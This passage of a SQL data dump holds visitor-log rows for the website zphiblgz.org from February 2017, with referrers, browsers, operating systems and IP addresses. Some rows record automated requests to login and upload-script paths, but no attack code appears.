782,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','142.4.16.117','000',1,0),(783,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','75.126.30.25','000',1,0),(784,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','188.166.245.140','000',1,0),(785,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','119.81.196.46','000',1,0),(786,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.187.79.199','000',1,0),(787,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.192.112.201','000',1,0),(788,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','64.90.40.104','000',2,0),(789,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','65.99.237.226','000',1,0),(790,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','74.50.21.65','000',1,0),(791,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','64.90.40.253','000',1,0),(792,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','89.34.92.120','000',1,0),(793,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','82.194.76.36','000',1,0),(794,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','95.142.159.173','000',1,0),(795,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','91.228.127.91','000',1,0),(796,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','52.0.123.245','000',1,0),(797,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.236.176.135','000',1,0),(798,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','94.103.101.84','000',1,0),(799,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','162.215.253.14','000',1,0),(800,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','87.233.78.203','000',1,0),(801,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','213.240.61.99','000',2,0),(802,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','85.222.230.227','000',1,0),(803,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','49.212.234.241','000',1,0),(804,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','46.4.215.152','000',1,0),(805,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','61.67.218.84','000',1,0),(806,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','186.202.161.42','000',1,0),(807,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','40.113.15.101','000',1,0),(808,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','5.10.105.47','000',1,0),(809,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','64.90.48.202','000',1,0),(810,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','198.1.88.28','000',1,0),(811,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','62.148.185.11','000',1,0),(812,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','198.57.203.254','000',1,0),(813,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','190.115.24.62','000',1,0),(814,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','130.211.88.131','000',1,0),(815,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','23.253.70.16','000',1,0),(816,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','64.90.40.10','000',1,0),(817,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','50.6.77.89','000',1,0),(818,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.187.158.29','000',1,0),(819,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','116.0.20.49','000',1,0),(820,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','142.4.15.179','000',1,0),(821,'2017-02-16','http://zphiblgz.org/','Chrome','Windows','30.0.1599.101','','185.58.227.98','000',2,0),(822,'2017-02-16','http://zphiblgz.org','Chrome','Windows','30.0.1599.101','','192.198.80.227','000',2,0),(823,'2017-02-16','zphiblgz.org','Chrome','Windows','50.0.2661.75','','91.121.12.106','000',1,0),(824,'2017-02-16','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',1,0),(825,'2017-02-16','http://zphiblgz.org','Chrome','Windows','40.0.2214.115','','104.207.150.177','000',1,0),(826,'2017-02-16','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','107.155.108.55','000',1,0),(827,'2017-02-16','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','50.76.160.42','000',1,0),(828,'2017-02-16','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','94.23.238.63','000',1,0),(829,'2017-02-16','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','52.67.115.165','000',1,0),(830,'2017-02-16','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','120.72.98.156','000',1,0),(831,'2017-02-16','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','210.224.185.181','000',1,0),(832,'2017-02-16','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(833,'2017-02-16','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(834,'2017-02-16','http://zphiblgz.org/wp-admin/logo_img.php','Chrome','Windows','42.0.2311.152','','195.154.181.15','000',1,0),(835,'2017-02-16','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','61.91.205.104','000',1,0),(836,'2017-02-16','http://www.yourimportcardoctor.com/','MSIE','Windows','8.0','','91.134.232.49','000',1,0),(837,'2017-02-16','http://zphiblgz.org/','MSIE','Windows','8.0','','85.248.227.165','000',1,0),(838,'2017-02-16','http://zphiblgz.org/','Safari','iPhone','10.0','','173.73.83.159','000',1,0),(839,'2017-02-16','http://zphiblgz.org','Firefox','Windows','40.1','','188.55.175.17','000',2,0),(840,'2017-02-16','https://www.google.com/','Chrome','Windows','56.0.2924.76','','67.98.222.36','000',1,0),(841,'2017-02-16','https://www.google.com/','Safari','iPhone','10.0','','66.87.84.141','000',1,0),(842,'2017-02-16','http://zphiblgz.org','Safari','iPhone','10.0','','66.87.81.212','000',2,0),(843,'2017-02-16','http://zphiblgz.org/scholarship/','Safari','iPhone','10.0','','68.134.178.206','000',16,0),(844,'2017-02-16','http://zphiblgz.org','Chrome','Android','56.0.2924.87','','68.100.76.162','000',2,0),(845,'2017-02-16','http://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.126','000',1,0),(846,'2017-02-17','http://zphiblgz.org','Firefox','Windows','40.1','','111.205.242.193','000',2,0),(847,'2017-02-17','http://zphiblgz.org','Chrome','Windows','30.0.1599.101','','204.12.240.34','000',2,0),(848,'2017-02-17','https://www.google.com/','Chrome','iPhone','56.0.2924.79','','108.45.134.11','000',4,0),(849,'2017-02-17','http://zphiblgz.org','Chrome','Windows','14.0.835.186','','192.185.4.40','000',1,0),(850,'2017-02-17','http://zphiblgz.org','Chrome','Windows','54.0.2840.99','','176.9.50.43','000',2,0),(851,'2017-02-17','http://zphiblgz.org','Chrome','Windows','30.0.1599.101','','192.198.80.227','000',3,0),(852,'2017-02-17','http://zphiblgz.org','Safari','iPhone','10.0','','66.87.81.239','000',3,0),(853,'2017-02-17','http://zphiblgz.org','Chrome','Android','56.0.2924.87','','66.87.80.30','000',4,0),(854,'2017-02-17','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.26','000',1,0),(855,'2017-02-17','http://m.facebook.com','AppleWebKit','iPhone','602.2.14','','96.5.120.250','000',4,0),(856,'2017-02-17','http://zphiblgz.org','MSIE','Windows','6.0','','198.204.244.162','000',1,0),(857,'2017-02-17','https://www.google.com/','Chrome','Windows','56.0.2924.87','','8.21.241.69','000',6,0),(858,'2017-02-17','https://www.google.com/','Safari','iPhone','10.0','','96.5.120.250','000',7,0),(859,'2017-02-17','http://zphiblgz.org','Firefox','Windows','40.1','','79.183.84.236','000',2,0),(860,'2017-02-17','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(861,'2017-02-17','https://www.google.com/','Chrome','Windows','56.0.2924.87','','167.102.191.10','000',2,0),(862,'2017-02-17','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwictJadypfSAhWJQ5AKHWq5AE4QFggaMAA&url=http%3A%2F%2Fzphiblgz.org%2F&usg=AFQjCNHl6iFFa_3VuMKJmTgYMIkup1fP8Q&sig2=BjKSdmp-IYljPqC6Xvk4tg&bvm=bv.147448319,d.eWE','MSIE','Windows','11.0','','65.242.75.101','000',2,0),(863,'2017-02-17','http://zphiblgz.org','MSIE','Windows','9.0','','62.4.22.24','000',57,0),(864,'2017-02-17','http://zphiblgz.org/modules/mod_simplefileuploadv1.3/elements/udd.php','Firefox','Windows','3.5.0','','62.4.22.24','000',5,0),(865,'2017-02-17','http://zphiblgz.org/','Safari','iPhone','10.0','','174.205.25.27','000',2,0),(866,'2017-02-17','http://zphiblgz.org','Chrome','Android','55.0.2883.91','','172.56.2.254','000',4,0),(867,'2017-02-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(868,'2017-02-17','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',3,0),(869,'2017-02-17','http://zphiblgz.org/','Chrome','Windows','30.0.1599.101','','138.128.67.111','000',3,0),(870,'2017-02-17','http://zphiblgz.org','Firefox','Windows','29.0','','5.145.4.225','000',2,0),(871,'2017-02-17','http://zphiblgz.org','Firefox','Windows','40.1','','41.140.17.110','000',2,0),(872,'2017-02-17','zphiblgz.org','Firefox','Windows','22.0','','80.92.164.204','000',1,0),(873,'2017-02-17','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','108.48.60.106','000',9,0),(874,'2017-02-17','http://m.facebook.com/','Chrome','Android','54.0.2840.85','','66.87.80.161','000',2,0),(875,'2017-02-17','http://zphiblgz.org','Edge','Windows','14.14393','','73.213.22.160','000',3,0),(876,'2017-02-17','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','71.244.250.154','000',3,0),(877,'2017-02-17','http://zphiblgz.org/','Chrome','Windows','30.0.1599.101','','94.242.57.102','000',1,0),(878,'2017-02-17','http://m.facebook.com','AppleWebKit','iPad','601.1.46','','73.132.236.75','000',1,0),(879,'2017-02-18','http://zphiblgz.org','Firefox','Windows','33.0','','204.12.240.34','000',1,0),(880,'2017-02-18','http://zphiblgz.org','Firefox','Windows','40.1','','78.97.163.98','000',2,0),(881,'2017-02-18','http://zphiblgz.org','Chrome','Windows','27.0.1453.90','','176.126.252.12','000',1,0),(882,'2017-02-18','http://zphiblgz.org','Firefox','Windows','33.0','','192.198.80.227','000',2,0),(883,'2017-02-18','http://zphiblgz.org','Safari','iPhone','10.0','','96.244.115.36','000',1,0),(884,'2017-02-18','http://zphiblgz.org','Safari','iPhone','600.1.4','','66.87.80.165','000',3,0),(885,'2017-02-18','http://m.facebook.com/','Chrome','Android','55.0.2883.91','','172.58.184.34','000',2,0),(886,'2017-02-18','http://zphiblgz.org/','Chrome','Android','55.0.2883.91','','172.58.184.51','000',1,0),(887,'2017-02-18','http://m.facebook.com/','Chrome','Android','55.0.2883.91','','172.58.185.167','000',2,0),(888,'2017-02-18','http://m.facebook.com','AppleWebKit','iPhone','601.1.46','','66.87.80.165','000',5,0),(889,'2017-02-18','http://m.facebook.com/','Chrome','Android','55.0.2883.91','','172.58.185.77','000',4,0),(890,'2017-02-18','http://zphiblgz.org','Chrome','Android','56.0.2924.87','','71.179.179.236','000',2,0),(891,'2017-02-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.88.148','000',3,0),(892,'2017-02-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','193.111.136.196','000',3,0),(893,'2017-02-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','139.162.141.52','000',2,0),(894,'2017-02-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','80.93.26.123','000',2,0),(895,'2017-02-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','178.210.90.90','000',3,0),(896,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','89.145.92.137','000',1,0),(897,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.185.220.12','000',1,0),(898,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.33.116.38','000',1,0),(899,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','151.80.35.152','000',1,0),(900,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','23.253.119.16','000',1,0),(901,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','207.96.150.11','000',1,0),(902,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','209.99.16.227','000',1,0),(903,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.207.255.55','000',1,0),(904,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','5.135.52.198','000',1,0),(905,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.163.162.3','000',1,0),(906,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','73.222.83.84','000',1,0),(907,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','93.115.52.160','000',2,0),(908,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','176.9.98.200','000',1,0),(909,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','59.125.119.188','000',1,0),(910,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','62.149.223.70','000',1,0),(911,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.212.193.211','000',1,0),(912,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','54.154.208.227','000',1,0),(913,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.247.41.78','000',1,0),(914,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','52.77.105.60','000',1,0),(915,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','103.37.8.109','000',2,0),(916,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','213.251.182.110','000',1,0),(917,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','82.223.243.253','000',1,0),(918,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','64.90.40.253','000',1,0),(919,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','97.74.195.196','000',2,0),(920,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','217.170.198.19','000',1,0),(921,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','45.55.128.168','000',1,0),(922,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','209.114.215.51','000',1,0),(923,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','45.55.147.145','000',1,0),(924,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','88.198.220.178','000',1,0),(925,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.104.28.59','000',1,0),(926,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','103.44.161.18','000',1,0),(927,'2017-02-18','http://zphiblgz.org','MSIE','Windows','8.0','','64.235.154.106','000',1,0),(928,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.113.221.89','000',1,0),(929,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','52.25.226.106','000',1,0),(930,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.74.65.22','000',1,0),(931,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','178.62.76.98','000',1,0),(932,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','70.35.207.145','000',1,0),(933,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','101.78.134.188','000',1,0),(934,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','213.235.63.231','000',1,0),(935,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','74.220.207.183','000',1,0),(936,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','51.254.98.144','000',1,0),(937,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.92.192.112','000',1,0),(938,'2017-02-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','129.232.212.210','000',1,0),(939,'2017-02-18','http://zphiblgz.org/','Chrome','Android','44.0.2403.133','','66.87.81.32','000',1,0),(940,'2017-02-18','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','165.225.34.116','000',4,0),(941,'2017-02-18','https://www.google.com/','Safari','iPhone','10.0','','66.87.80.226','000',1,0),(942,'2017-02-18','http://zphiblgz.org','Chrome','Android','56.0.2924.87','','166.137.240.113','000',6,0),(943,'2017-02-18','http://zphiblgz.org','Safari','iPhone','10.0','','192.12.13.14','000',7,0),(944,'2017-02-18','http://zphiblgz.org','Edge','Windows','12.10240','','192.12.13.14','000',3,0),(945,'2017-02-18','http://zphiblgz.org','Firefox','Windows','40.1','','86.125.148.71','000',1,0),(946,'2017-02-18','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(947,'2017-02-18','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',2,0),(948,'2017-02-18','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','104.223.112.66','000',1,0),(949,'2017-02-18','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.101.169','000',1,0),(950,'2017-02-18','http://zphiblgz.org','Chrome','Linux','50.0.2661.75','','163.172.16.251','000',1,0),(951,'2017-02-18','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.11','000',13,0),(952,'2017-02-18','http://zphiblgz.org','Chrome','Macintosh','37.0.2114.53','','23.106.26.90','000',2,0),(953,'2017-02-18','https://www.google.com/','Edge','Windows','14.14393','','73.128.75.107','000',21,0),(954,'2017-02-18','http://zphiblgz.org','Firefox','Windows','34.0','','204.12.240.34','000',1,0),(955,'2017-02-18','http://zphiblgz.org/Marvins.php','MSIE','Windows','6.0','','5.45.66.28','000',1,0),(956,'2017-02-18','http://zphiblgz.org','Firefox','Windows','40.1','','130.105.228.172','000',2,0),(957,'2017-02-18','http://zphiblgz.org/chapter-history','Chrome','Android','55.0.2883.91','','172.58.184.210','000',1,0),(958,'2017-02-19','http://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','46.4.17.228','000',1,0),(959,'2017-02-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.8','000',1,0),(960,'2017-02-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.244.93','000',1,0),(961,'2017-02-19','http://zphiblgz.org','Firefox','Windows','34.0','','192.198.80.227','000',1,0),(962,'2017-02-19','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','MSIE','Windows','8.0','','5.61.35.40','000',1,0),(963,'2017-02-19','http://zphiblgz.org/wp-admin/','MSIE','Windows','6.0','','5.61.35.40','000',1,0),(964,'2017-02-19','http://zphiblgz.org','Firefox','Windows','29.0','','37.114.147.118','000',2,0),(965,'2017-02-19','http://zphiblgz.org','Firefox','Windows','40.1','','178.149.107.183','000',2,0),(966,'2017-02-19','http://zphiblgz.org','Firefox','Windows','40.1','','188.2.148.245','000',2,0),(967,'2017-02-19','https://www.google.com/','Safari','iPhone','10.0','','74.109.32.35','000',1,0),(968,'2017-02-19','http://zphiblgz.org','Firefox','Windows','40.1','','139.194.88.82','000',2,0),(969,'2017-02-19','https://www.google.com/','Safari','iPhone','10.0','','66.87.81.129','000',1,0),(970,'2017-02-19','zphiblgz.org','Chrome','Windows','50.0.2661.75','','37.187.132.5','000',15,0),(971,'2017-02-19','74.220.219.51','Firefox','Windows','33.0','','159.203.42.143','000',1,0),(972,'2017-02-19','http://zphiblgz.org','Firefox','Windows','33.0','','107.170.96.6','000',1,0),(973,'2017-02-19','http://zphiblgz.org','Firefox','Windows','29.0','','188.129.172.87','000',2,0),(974,'2017-02-19','http://zphiblgz.org','Chrome','Windows','24.0.1290.1','','83.166.241.120','000',2,0),(975,'2017-02-19','http://zphiblgz.org','Firefox','Macintosh','49.0','','173.67.4.243','000',7,0),(976,'2017-02-19','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','73.87.118.19','000',6,0),(977,'2017-02-19','http://zphiblgz.org','Firefox','Linux','49.0','','108.48.105.40','000',4,0),(978,'2017-02-19','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(979,'2017-02-19','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',3,0),(980,'2017-02-19','http://zphiblgz.org/','Chrome','Android','56.0.2924.87','','174.204.12.11','000',1,0),(981,'2017-02-19','http://zphiblgz.org','Safari','iPhone','10.0','','174.204.8.215','000',3,0),(982,'2017-02-19','http://zphiblgz.org','Firefox','Windows','29.0','','182.75.114.174','000',2,0),(983,'2017-02-19','http://zphiblgz.org','Chrome','Windows','52.0.2743.116','','158.69.228.56','000',25,0),(984,'2017-02-19','http://www.zphibmaryland.org/chapters/','Chrome','Windows','56.0.2924.87','','73.128.192.77','000',8,0),(985,'2017-02-19','zphiblgz.org','Chrome','Windows','50.0.2661.75','','166.62.90.110','000',9,0),(986,'2017-02-20','zphiblgz.org','Chrome','Windows','50.0.2661.75','','166.62.90.110','000',6,0),(987,'2017-02-20','http://zphiblgz.org/','AppleWebKit','iPhone','602.4.6','','73.87.118.19','000',1,0),(988,'2017-02-20','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','76.21.220.89','000',14,0),(989,'2017-02-20','https://www.google.com/','Safari','iPhone','10.0','','99.59.207.35','000',1,0),(990,'2017-02-20','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.179.165.166','000',10,0),(991,'2017-02-20','http://m.facebook.com/','Chrome','Android','55.0.2883.91','','68.134.63.137','000',3,0),(992,'2017-02-20','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','108.15.33.148','000',4,0),(993,'2017-02-20','https://www.facebook.com/','Firefox','Windows','51.0','','63.88.62.157','000',6,0),(994,'2017-02-20','http://zphiblgz.org','Firefox','Windows','4.0b7','','46.229.170.197','000',1,0),(995,'2017-02-20','http://zphiblgz.org','Firefox','Linux','5.0','','46.229.170.197','000',1,0),(996,'2017-02-20','http://zphiblgz.org','Edge','Windows','14.14393','','100.16.224.240','000',11,0),(997,'2017-02-20','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','100.16.224.240','000',9,0),(998,'2017-02-20','http://zphiblgz.org','Firefox','Windows','40.1','','91.150.79.180','000',2,0),(999,'2017-02-20','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','204.126.132.241','000',3,0),(1000,'2017-02-20','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(1001,'2017-02-20','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(1002,'2017-02-20','http://zphiblgz.org','Firefox','Windows','40.1','','85.71.132.206','000',1,0),(1003,'2017-02-20','http://zphiblgz.org/','Firefox','Windows','35.0','','23.94.182.139','000',3,0),(1004,'2017-02-20','http://zphiblgz.org','Firefox','Windows','35.0','','204.12.240.34','000',1,0),(1005,'2017-02-20','http://m.facebook.com/','Chrome','Android','56.0.2924.87','','172.58.185.202','000',2,0),(1006,'2017-02-20','http://m.facebook.com','AppleWebKit','iPhone','602.2.14','','66.87.81.112','000',2,0),(1007,'2017-02-20','http://zphiblgz.org','Edge','Windows','14.14393','','73.213.22.160','000',4,0),(1008,'2017-02-20','https://www.google.com/','Safari','iPad','9.0','','73.50.19.101','000',1,0),(1009,'2017-02-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','66.147.242.184','000',1,0),(1010,'2017-02-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','81.30.150.82','000',1,0),(1011,'2017-02-20','http://m.facebook.com','AppleWebKit','iPhone','602.3.12','','73.200.94.19','000',5,0),(1012,'2017-02-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','182.48.49.155','000',1,0),(1013,'2017-02-20','https://www.google.com/','Safari','iPhone','600.1.4','','68.33.90.92','000',3,0),(1014,'2017-02-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','110.4.47.45','000',1,0),(1015,'2017-02-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','64.71.32.32','000',1,0),(1016,'2017-02-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','217.160.62.44','000',1,0),(1017,'2017-02-20','https://www.google.com/','Chrome','Windows','56.0.2924.87','','73.173.36.122','000',16,0),(1018,'2017-02-20','http://zphiblgz.org','Safari','Macintosh','9.1.3','','108.18.105.96','000',1,0),(1019,'2017-02-20','http://zphiblgz.org','Firefox','Windows','40.1','','24.30.69.166','000',1,0),(1020,'2017-02-20','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','95.140.34.11','000',2,0),(1021,'2017-02-20','http://zphiblgz.org','Safari','iPad','10.0','','71.121.204.212','000',3,0),(1022,'2017-02-20','http://zphiblgz.org','Firefox','Windows','40.1','','124.106.241.248','000',2,0),(1023,'2017-02-20','http://zphiblgz.org','Chrome','Windows','31.0.1650.57','','178.165.88.182','000',3,0),(1024,'2017-02-20','http://zphiblgz.org','Chrome','Android','56.0.2924.87','','69.143.32.105','000',1,0),(1025,'2017-02-20','http://domznaniy.ru/','MSIE','Windows','5.5','','46.118.233.101','000',2,0),(1026,'2017-02-20','http://zphiblgz.org','Chrome','Android','47.0.2526.83','','68.33.89.19','000',2,0),(1027,'2017-02-20','http://zphiblgz.org','Silk','Kindle Fire','56.1.61','','76.21.153.39','000',2,0),(1028,'2017-02-20','http://zphiblgz.org','Safari','Macintosh','6.2.8','','96.244.100.67','000',1,0),(1029,'2017-02-20','http://zphiblgz.org','Firefox','Windows','39.0','','195.22.127.139','000',2,0),(1030,'2017-02-20','http://zphiblgz.org','Safari','iPhone','10.0','','108.48.99.50','000',1,0),(1031,'2017-02-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.244.78','000',1,0),(1032,'2017-02-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','194.249.238.164','000',15,0),(1033,'2017-02-21','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(1034,'2017-02-21','http://zphiblgz.org','Firefox','Windows','3.6.8','','89.234.68.124','000',9,0),(1035,'2017-02-21','http://zphiblgz.org','Microsoft','Unknown','Unknown','','76.21.220.89','000',2,0),(1036,'2017-02-21','http://zphiblgz.org','MSIE','Windows','7.0','','76.21.220.89','000',2,0),(1037,'2017-02-21','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','76.21.220.89','000',13,0),(1038,'2017-02-21','zphiblgz.org','Chrome','Windows','50.0.2661.75','','101.201.209.247','000',1,0),(1039,'2017-02-21','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','198.204.240.42','000',1,0),(1040,'2017-02-21','http://zphiblgz.org/css.php','Chrome','Windows','42.0.2311.152','','195.154.181.162','000',1,0),(1041,'2017-02-21','zphiblgz.org','Chrome','Windows','50.0.2661.75','','151.80.25.190','000',4,0),(1042,'2017-02-21','zphiblgz.org','Chrome','Windows','50.0.2661.75','','104.236.18.228','000',4,0),(1043,'2017-02-21','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','68.33.74.2','000',7,0),(1044,'2017-02-21','http://zphiblgz.org','Firefox','Windows','29.0','','88.146.198.73','000',2,0),(1045,'2017-02-21','http://zphiblgz.org','Firefox','Windows','40.1','','178.192.131.176','000',1,0),(1046,'2017-02-21','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.24','000',1,0),(1047,'2017-02-21','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','73.213.165.238','000',2,0),(1048,'2017-02-21','http://zphiblgz.org/','MSIE','Windows','11.0','','192.3.31.85','000',3,0),(1049,'2017-02-21','http://zphiblgz.org','MSIE','Windows','11.0','','204.12.240.34','000',2,0),(1050,'2017-02-21','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjNpt7avqHSAhUm34MKHRqTB0wQFggbMAA&url=http%3A%2F%2Fzphiblgz.org%2F&usg=AFQjCNHl6iFFa_3VuMKJmTgYMIkup1fP8Q','Firefox','Windows','35.0','','50.225.39.37','000',3,0),(1051,'2017-02-21','http://zphiblgz.org','Microsoft','Unknown','Unknown','','50.225.39.37','000',1,0),(1052,'2017-02-21','http://zphiblgz